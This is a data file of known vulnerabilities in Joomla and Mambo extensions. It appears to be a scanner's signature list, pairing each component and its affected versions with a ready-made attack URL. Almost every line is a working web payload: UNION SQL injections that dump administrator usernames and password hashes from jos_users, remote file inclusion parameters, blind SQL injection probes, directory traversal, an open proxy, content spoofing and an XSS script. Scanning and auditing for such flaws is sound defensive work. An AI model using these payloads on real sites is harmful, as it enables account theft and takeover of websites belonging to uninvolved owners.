Component: People Book File Inclusion Vulnerability Versions effected: 1.1.5 and older|/administrator/components/com_peoplebook/param.peoplebook.php|/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=
Component: Feederator - RSS manager Component Multiple Remote File Inclusion Vulnerabilities Version Affected: 1.0.5 <= |/components/com_recly/|/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=[evilcode] /components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=[evilcode] /components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=[evilcode] /components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=
Component: Joomla com_books(book_id) SQL Injection Vulnerability Version Affected: <= |/components/com_books/|/index.php?option=com_books&task=book_details&book_id=-9999+UNION+SELECT+1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_catalogproduction (id) SQL Injection Vulnerability Version Affected: N/A |/components/com_catalogproduction/|/index.php?option=com_catalogproduction&task=viewdetail&id=-9999+union+all+select+1,2,concat(username,char(58),password),null,null,6,7,8,9,0,11,12,13,14,15,16,17,null,19,20+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: Simple RSS Reader Component Remote File Inclusion Vulnerability Version Affected: 1.0 <= |/components/com_rssreader/|/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=
Component: Hot Property Version Affected: 0.97<= |/components/com_hotproperties/|N/A
Component: com_contactinfo(catid) SQL Injection Vulnerability Version Affected: N/A|/components/com_contactinfo/|/index.php?option=com_contactinfo&catid=-9999/**/UNION/**/SELECT/**/1,2,concat(username,char(58),password),4,5,6,7,8,9,0,11,12,13,14,15,16+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--/*
Component: A6MamboCredits File Inclusion Vulnerability Versions effected: Any |/administrator/components/com_a6mambocredits/|/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_absolute_path=
Component: A6MamboHelpDesk File Inclusion Vulnerability Versions effected: Any Version|/administrator/components/com_a6mambohelpdesk/|/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=
Component: Colophon File Inclusion Vulnerability Versions effected: 1.2 and older|/administrator/components/com_colophon/|/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=
Component: Community Builder Component File Inclusion Vulnerability Versions Affected: 1.0<= |/administrator/components/com_comprofiler/plugin.class.php|/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=
Component: MambelFish RFI Vulnerability Versions effected: 1.x and older|/administrator/components/com_mambelfish/|/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=
Component: Com Profiler Blind SQL Injection Vulnerability Versions effected: 1.0 RC2 and older|/administrator/components/com_comprofiler/|/index.php?option=com_comprofiler&task=userProfile&user=1+and+1=1::/index.php?option=com_comprofiler&task=userProfile&user=1+and+1=2
Component: User Home Pages 2 File Inclusion Vulnerability Versions effected: 1.1.1 and older|/administrator/components/com_uhp2/|/administrator/components/com_uhp2/uhp_config.php?mosConfig_absolute_path=

Component: User Home Pages 1 File Inclusion Vulnerability Versions effected: 1.1.1 and older|/administrator/components/com_uhp/|/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=
Component: Bayesian Naive Filter File Inclusion Vulnerability Versions effected: 1.1 and older|/administrator/components/com_bayesiannaivefilter/|/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=
Component: Webring File Inclusion Vulnerability Versions effected: 1.0 and older|/administrator/components/com_webring/|/administrator/components/com_webring/admin.webring.docs.php?component_dir=
Component: JIM File Inclusion Vulnerability Versions effected: 1.0.1 and older|/administrator/components/com_jim/|/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=
Component: Mambo Gallery Manager(com_mgm) File Inclusion Vulnerability Versions effected: Any Version|/administrator/components/com_mgm/|/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
Component: Link Directory File Inclusion Vulnerability Versions effected: Any Version|/administrator/components/com_linkdirectory/|/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=
Component: Kochsuite File Inclusion Vulnerability Versions effected: 0.9.4 and older|/administrator/components/com_kochsuite /|/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=
Component: SWmenu File Inclusion Vulnerability Versions effected: 4.0 and older|/administrator/components/com_swmenupro/|/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=
Component: JoomlaPack File Inclusion Vulnerability Versions effected: 1.0.4a2 RE and older|/administrator/components/com_jpack/|/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=
Component: Joomla Radio 5 File Inclusion Vulnerability Versions effected: 5.0 and older|/administrator/components/com_joomlaradiov5/|/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=
Component: Joomla Flash Fun! File Inclusion Vulnerability Versions effected: 1.0 and older|/administrator/components/com_joomlaflashfun/|/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=
Component: JContentSubscription File Inclusion Vulnerability Versions effected: 1.5.8 and older|/administrator/components/com_jcs/|/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=
Component: Joomla Flash Uploader File Inclusion Vulnerability Versions effected: 2.5.2 and older|/administrator/components/com_joomla_flash_uploader/|/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=
Component: MosMedia File Inclusion Vulnerability Versions effected: 1.0.8 and older|/administrator/components/com_mosmedia/|/administrator/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=
Component: WmT Advanced Flash Gallery File Inclusion Vulnerability Versions effected: 1.0 and older|/administrator/components/com_wmtgallery/|/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=
Component: Webmaster Tips Portfolio File Inclusion Vulnerability Versions effected: 1.0 and older|/administrator/components/com_wmtportfolio/|/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=
Component: Color Lab File Inclusion Vulnerability Versions effected: 1.0 and older|/administrator/components/com_colorlab/|/administrator/components/com_color/admin.color.php?mosConfig_live_site=
Component: Carousel Flash Image Gallery File Inclusion Vulnerability Versions effected: 1.0 and older|/administrator/components/com_jjgallery/|/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=
Component: eXtplorer Local Directory Traversal Vulnerability Versions Affected: 2.0.0 RC2 <= |/extplorer/|/index.php?com_extplorer-test2
Component: JUser File Inclusion Vulnerability Versions effected: 1.0.14 and older|/administrator/components/com_juser/|/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=

Component: eXtplorer Local Directory Traversal Vulnerability Versions Affected: 2.0.0 RC2 <= |/eXtplorer/|/index.php?com_extplorer-test3
Component: eXtplorer Local Directory Traversal Vulnerability Versions Affected: 2.0.0 RC2 <= |/administrator/components/com_extplorer/|/index.php?com_extplorer-test1
Component: Joomla! 12Pictures File Inclusion Vulnerability Versions effected: 1.0 and older|/administrator/components/com_joom12pic/|/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=
Component: Flash Panoramic View File Inclusion Vulnerability Versions effected: 1.0 and older|/administrator/components/com_panoramic/|/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=
Component: Community Builder Component File Inclusion Vulnerability Versions Affected: 1.0<= |/components/com_comprofiler/plugin.class.php|/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=
Component: com_djiceshoutbox Persistent XSS Vulnerability Versions Affected: 1.0|/components/com_djiceshoutbox/|/index.php?option=com_djiceshoutbox&view=ajax&format=djiceshoutbox
Component: com_flyspray File Inclusion Vulnerability Versions Affected: N/A|/components/com_flyspray/startdown.php|/components/com_flyspray/startdown.php?file=
Component: ExtCalendar File Inclusion Vulnerability Versions effected: 0.9.1 and older|/components/com_extcalendar/extcalendar.php|/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=
Component: PC CookBook File Inclusion Vulnerability Versions effected: 1.3 and older|/components/com_pccookbook/pccookbook.php|/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
Component: com_smf File Inclusion Vulnerability Versions Affected: N/A|/components/com_smf/smf.php|/components/com_smf/smf.php?mosConfig_absolute_path=
Component: com_loudmounth File Inclusion Vulnerability Versions Affected: N/A|/components/com_loudmounth/includes/abbc/abbc.class.php|/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=
Component: Multibanners File Inclusion Vulnerability Versions effected: Any Version|/administrator/components/com_multibanners/extadminmenus.class.php|/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=
Component: Cmimarketplace (viewit) Directory Traversal Vulnerability Versions Affected: N/A|/components/com_cmimarketplace/|/index.php?option=com_cmimarketplace&Itemid=1&viewit=/../../&cid=1
Component: akocomments.php File Inclusion Vulnerability Versions Affected: N/A|/akocomments.php|/akocomments.php?mosConfig_absolute_path=
Component: Crop Image File Inclusion Vulnerability Versions effected: 1.0 and older|/administrator/components/com_cropimage/admin.cropcanvas.php|/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=
Component: Serverstat File Inclusion Vulnerability Versions effected: 0.4.4 and older|/administrator/components/com_serverstat/install.serverstat.php|/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=
Component: com_ijoomla_archive (catid) Blind SQL Injection Vulnerability Versions Affected: N/A|/components/com_ijoomla_archive/|/index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&catid=1+and+1=1::/index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&catid=1+and+1=2
Component: Remository File Inclusion Vulnerability Versions effected: 3.25 and older|/administrator/components/com_remository/admin.remository.php|/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
Component: Lurm Constructor File Inclusion Vulnerability Versions effected: 0.6b and older|/administrator/components/com_lurm_constructor/admin.lurm_constructor.php|/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=

Component: com_digistore (pid) Blind SQL Injection Vulnerability Versions Affected: N/A|/components/com_digistore/|/index.php?option=com_digistore&task=show_product&pid=1+and+1=1::/index.php?option=com_digistore&task=show_product&pid=1+and+1=2
Component: Php Shop File Inclusion Vulnerability Versions effected: 1.2 RC2b and older|/administrator/components/com_phpshop/toolbar.phpshop.html.php|/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
Component: com_maianmusic SQL Injection Vulnerability Versions effected: 1.2.1|/components/com_maianmusic/|/index.php?option=com_maianmusic&section=category&category=-1+union+select+1,2,3,concat(username,char(58),password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=1
Component: Mambo eMail Publisher File Inclusion Vulnerability Versions Affected: N/A|/administrator/components/com_mmp/help.mmp.php|/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=
Component: BSQ Site Stats File Inclusion Vulnerability Versions effected: N/A |/components/com_bsq_sitestats/external/rssfeed.php|/components/com_bsq_sitestats/external/rssfeed.php?baseDir=
Component: CHRONOContact File Inclusion Vulnerability Versions effected: N/A|/administrator/components/com_chronocontact/excelwriter/PPS/File.php|/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=
Component: com_feederator File Inclusion Vulnerability Versions Affected: N/A|/components/com_feederator/includes/tmsp/add_tmsp.php|/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=
Component: com_feederator File Inclusion Vulnerability Versions Affected: N/A|/administrator/components/com_feederator/includes/tmsp/add_tmsp.php|/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=
Component: com_bookjoomlas SQL Injection Vulnerability Versions effected: 0.1|/components/com_bookjoomlas/|/index.php?option=com_bookjoomlas&Itemid=1&func=comment&gbid=-1 UNION ALL SELECT 1,2,NULL,4,NULL,6,7,NULL,9,CONCAT(username,0x3a,password),11,12,13,14,15,16 FROM jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: GameQ SQL Injection Vulnerability Version Affected: 4.0<= |/components/com_gameq/|/index.php?option=com_gameq&task=page&category_id=-1+UNION+SELECT+1,2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6,7,8,9,10,11,12,13,14+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: astatsPRO SQL Injection Vulnerability Versions effected: 1.0.0 and older|/administrator/components/com_astatspro/refer.php|/administrator/components/com_astatspro/refer.php?id=-1+UNION+SELECT+0,1,concat(username,0x3a,password,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: prayercenter SQL injection Vulnerability Version Affected: N/A|/components/com_prayercenter/|/index.php?option=com_prayercenter&task=view_request&id=-1+UNION+SELECT+1,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: pcchess SQL Injection Vulnerability Versions effected: N/A|/components/com_pcchess/|/index.php?option=com_pcchess&Itemid=61&page=players&user_id=-9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_garyscookbook SQL Injection Vulnerability Versions Affected: N/A|/components/com_garyscookbook/|/index.php?option=com_garyscookbook&Itemid=21&func=detail&id=-666+UNION+SELECT+0,0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_hello_world SQL Injection Vulnerability Versions Affected: N/A|/components/com_hello_world/|/index.php?option=com_hello_world&Itemid=27&task=show&type=intro&id=-9999999+UNION+SELECT+1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),4+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_cms SQL Injection Vulnerability Versions Affected: N/A|/components/com_cms/|/index.php?option=com_cms&act=viewitems&cat_id=-9999999+UNION+SELECT+111,111,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),222,222,333,333+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_most SQL Injection Vulnerability Versions Affected: N/A|/components/com_most/|/index.php?option=com_most&mode=email&secid=-9999999+UNION+SELECT+0000,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),2222,3333+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_idvnews SQL Injection Vulnerability Versions Affected: N/A |/components/com_idvnews/|/index.php?option=com_idvnews&id=-1+UNION+SELECT+0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),2222,0,0,0,0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_joomlavvz SQL Injection Vulnerability Versions Affected: N/A|/components/com_joomlavvz/|/index.php?option=com_joomlavvz&Itemid=34&func=detail&id=-9999999+UNION+SELECT+0x3a,0x3a,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_referenzen SQL Injection Vulnerability Versions Affected: N/A|/components/com_referenzen/|/index.php?option=com_referenzen&Itemid=7&detail=-9999999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7,8,9,0,0,0,0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_genealogy SQL Injection Vulnerability Versions Affected: N/A|/components/com_genealogy/|/index.php?option=com_genealogy&task=profile&id=-9999999+UNION+SELECT+0,1,2,3,4,5,6,7,8,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_listoffreeads SQL Injection Vulnerability Versions Affected: N/A|/components/com_listoffreeads/|/index.php?option=com_listoffreeads&AdId=1+UNION+SELECT+0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_geoboerse SQL Injection Vulnerability Versions Affected: N/A|/components/com_geoboerse/|/index.php?option=com_geoboerse&page=view&catid=-1+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_ricette SQL Injection Vulnerability Versions Affected: N/A |/components/com_ricette/|/index.php?option=com_ricette&Itemid=1&func=detail&id=-9999999+UNION+SELECT+0,0,111,111,222,333,0,0,0,0,0,1,1,1,1,1,1,1,1,1,0,0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_team SQL Injection Vulnerability Versions Affected: N/A|/components/com_team/|/index.php?option=com_team&gid=-1+UNION+SELECT+1,2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6,7,8,9,10,username,12,13+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_formtool SQL Injection Vulnerability Versions Affected: N/A|/components/com_formtool/|/index.php?option=com_formtool&task=view&formid=2&catid=-9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_sg SQL Injection Vulnerability Versions Affected: N/A|/components/com_sg/|/index.php?option=com_sg&Itemid=16&task=order&range=3&category=3&pid=-9999999+UNION+SELECT+0,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0,0,0,0,0,0,0,10,11,0,0,14,15,16+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: faq SQL Injection Vulnerability Versions effected: N/A|/components/com_faq/|/index.php?option=faq&task=viewallfaq&catid=-9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_omnirealestate SQL Injection Vulnerability Versions Affected: N/A|/components/com_omnirealestate/|/index.php?option=com_omnirealestate&Itemid=0&func=showObject&info=contact&objid=-9999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&results=joomla
Component: com_model SQL Injection Vulnerability Versions Affected: N/A|/components/com_model/|/index.php?option=com_model&Itemid=0&task=pipa&act=2&objid=-9999+UNION+SELECT+username,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72
Component: com_mezun SQL Injection Vulnerability Versions Affected: N/A|/components/com_mezun/|/index.php?option=com_mezun&task=edit&hidemainmenu=joomla&id=-9999999+UNION+SELECT+0,0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_ewriting SQL Injection Vulnerability Versions Affected: N/A|/components/com_ewriting/|/index.php?option=com_ewriting&Itemid=9999&func=SELECTcat&cat=-1+UNION+ALL+SELECT+1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),4,5,6,7,8,9,10+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_livechat SQL Injection Vulnerability Versions Affected: N/A |/components/com_livechat/getSavedChatRooms.php|/components/com_livechat/getSavedChatRooms.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3%20from%20jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_livechat SQL Injection Vulnerability Versions Affected: N/A |/administrator/components/com_livechat/getSavedChatRooms.php|/administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3%20from%20jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_letterman Remote File Inclusion Vulnerability Versions effected: N/A|/components/com_letterman/|/index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=
Component: com_livechat Open Proxy Vulnerability Versions Affected: N/A|/components/com_livechat/xmlhttp.php|/components/com_livechat/xmlhttp.php?GET$01$2$3$4$5$http://www.google.com
Component: com_livechat Open Proxy Vulnerability Versions Affected: N/A|/administrator/components/com_livechat/xmlhttp.php|/administrator/components/com_livechat/xmlhttp.php?GET$01$2$3$4$5$http://www.google.com
Component: com_mydyngallery SQL Injection Vulnerability Versions Affected: N/A|/components/com_mydyngallery/|/index.php?option=com_mydyngallery&directory=zzz'+union+select+0,1,2,concat(0x3C703E,username,0x7c,password,0x3C2F703E),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_jmovies SQL Injection Vulnerability Versions Affected: N/A |/components/com_jmovies/|/index.php?option=com_jmovies&Itemid=29&task=detail&id=-1+union+select+1,concat(0x215F,username,0x3a,password,0x215F)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_tech_article SQL Injection Vulnerability Versions Affected: N/A|/components/com_tech_article/|/index.php?option=com_tech_article&task=item&Itemid=17&item=-1+union+select+0,concat(username,0x3a,password),0,0,0,0,0,0,0+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_hbssearch Blind SQL Injection Vulnerability Versions Affected: N/A|/components/com_hbssearch/|/index.php?option=com_hbssearch&task=showhoteldetails&id=4&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&star=&child1=0&adult1=1&Itemid=54&r_type=1+and+1=1::/index.php?option=com_hbssearch&task=showhoteldetails&id=4&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&star=&child1=0&adult1=1&Itemid=54&r_type=1+and+1=2
Component: com_tophotelmodule Blind SQL Injection Vulnerability Versions Affected: N/A|/components/com_tophotelmodule/|/index.php?option=com_tophotelmodule&task=showhoteldetails&id=1+and+1=1::/index.php?option=com_tophotelmodule&task=showhoteldetails&id=1+and+1=2
Component: com_volunteer SQL Injection Vulnerability Version Affected: N/A|/components/com_volunteer/|/index.php?option=com_volunteer&task=jobs&act=jobshow&Itemid=29&orgs_id=3&job_id=-9999+union+all+select+concat(username,char(58),password),2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&filter=&city_id=&function_id=&limit=5&pageno=1
Component: com_lowcosthotels (id) Blind SQL Injection Vulnerability Versions Affect: N/A|/components/com_lowcosthotels/|/index.php?option=com_lowcosthotels&task=showhoteldetails&id=1+and%201=1::/index.php?option=com_lowcosthotels&task=showhoteldetails&id=1+and%201=2
Component: com_allhotels (id) Blind SQL Injection Vulnerability Versions Affect: N/A|/components/com_allhotels/|/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%201=1::/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%201=2
Component: com_ice(catid) Blind SQL Injection Vulnerability Versions Affected: N/A |/components/com_ice/|/index.php?option=com_ice&catid=1 and 1=1::/index.php?option=com_ice&catid=1 and 1=2
Component: com_liveticker(tid) Blind SQL Injection Vulnerability Versions Affected: N/A|/components/com_liveticker/|/index.php?option=com_liveticker&task=viewticker&tid=1 and 1=1::/index.php?option=com_liveticker&task=viewticker&tid=1 and 1=2
Component: com_mdigg(category) SQL Injection vulnerability Versions Affected: N/A|/components/com_mdigg/|/index.php?option=com_mdigg&act=story_lists&task=view&category=-9999/**/union/**/all/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,0,11,12,13/**/from/**/jos_users/*
Component: Joomla Module com_5starhotels(id) SQL Vulnerability Versions Affected: N/A|/components/com_5starhotels/|/index.php?option=com_5starhotels&task=showhoteldetails&id=1+union+select+1,concat(username,0x3a,password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: PAX Gallery (gid) Blind SQL Injection Vulnerability Versions effected: v 0.1 <= |/components/com_paxgallery/|/index.php?option=com_paxgallery&task=table&gid=1%20and%201=1::/index.php?option=com_paxgallery&task=table&gid=1%20and%201=2
Component: com_na_content Blind SQL Injection Vulnerability Versions effected: v 1.0 <= |/components/com_na_content/|/index.php?option=com_na_content&task=view&id=1+and+1=1::/index.php?option=com_na_content&task=view&id=1+and+1=2
Component: com_na_mydocs (errmsg) Content Spoofing Vulnerability Version Affected: N/A|/components/com_na_mydocs/|/index.php?option=com_na_mydocs&task=showerr&errmsg=Your%20site%20has%20been%20hacked!
Component: com_simple_review SQL injection Vulnerability Versions effected: N/A|/components/com_simple_review/|/index.php?option=com_simple_review&category=4+AND+1=2+UNION+SELECT+0,concat_ws(username,0x3a,password),2+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_na_newsdescription SQL Injection Vulnerability Versions effected: N/A|/components/com_na_newsdescription/|/index.php?option=com_na_newsdescription&task=show&groupId=17377_19&newsid=85790+AND+1=2+UNION+SELECT+concat(username,0x3a,password),1,2,3,4,5,6,7+from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_phocadocumentation SQL Injection Vulnerability Versions effected: N/A|/components/com_phocadocumentation/|/index.php?option=com_phocadocumentation&view=section&id=1+AND+1=2+UNION+SELECT+concat(username,0x3a,password),1,2+from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_xevidmegahd SQL Injection Vulnerability Versions effected: N/A|/components/com_xevidmegahd/|/index.php?option=com_xevidmegahd&Itemid=99999&func=viewcategory&catid=1+UNION+SELECT+concat(username,0x3a,password)+from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_jashowcase SQL Injection Vulnerability Versions effected: N/A|/components/com_jashowcase/|/index.php?option=com_jashowcase&view=jashowcase&Itemid=109&catid=34+AND+1=2+UNION+SELECT+0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12+from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_newsflash SQL Injection Vulnerability Versions effected: N/A|/components/com_newsflash/|/index.php?option=com_newsflash&catid=0&id=8+and+1=1+union+select+1,username,password,4+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: Portfol (com_portfol) SQL Injection Vulnerability Versions effected: 1,2|/components/com_portfol/|/index.php?option=com_portfol&Itemid=814&task=viewcategory&vcatid=-96+union+select+concat(username,char(58),password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_gigcal variant#1 SQL Injection Vulnerability Versions effected: N/A|/components/com_gigcal/|/index.php?option=com_gigcal&task=details&gigcal_gigs_id=402'+and+1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,concat(username,char(58),password),0,11,12+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*&Itemid=37
Component: com_gigcal variant#2 SQL Injection Vulnerability Versions effected: N/A|/components/com_gigcal/|/index.php?option=com_gigcal&Itemid=78&id=-999+union+all+select+1,2,3,4,5,6,7,8,9,concat(username,char(58),password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component: Camelcitydb2 SQL Injection Vulnerability Versions effected: N/A|/components/com_camelcitydb2/|/index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&view=detail&Itemid=15
Component: com_fantasytournament SQL Injection Vulnerability Versions effected: N/A|/components/com_fantasytournament/|/index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=-63+union+select+concat(username,char(58),password),2,3+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: com_rdautos SQL Injection Vulnerability Versions effected: N/A|/components/com_rdautos/|/index.php?option=com_rdautos&view=category&id=-1+union+select+concat(username,char(58),password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=54
Component: com_news SQL Injection Vulnerability Versions effected: N/A|/components/com_news/|/index.php?option=com_news&id=-148+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-
Component: BazaarBuilder Shopping Cart Software (com_prod) SQL Injection Vulnerability Versions effected: 5.0<= |/components/com_prod/|/index.php?option=com_prod&task=products&cid=-9999%20union%20all%20select%201,2,3,concat(username,char(58),password),5,6,7,8,9,10,11,12,13,14,15,16,17,18%20from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72+/*+
Component: com_beamospetition XSS Vulnerability Versions effected: 1.0.12|/components/com_beamospetition/|/index.php?option=com_beamospetition&func=sign&pet='><script>alert(1)</script>
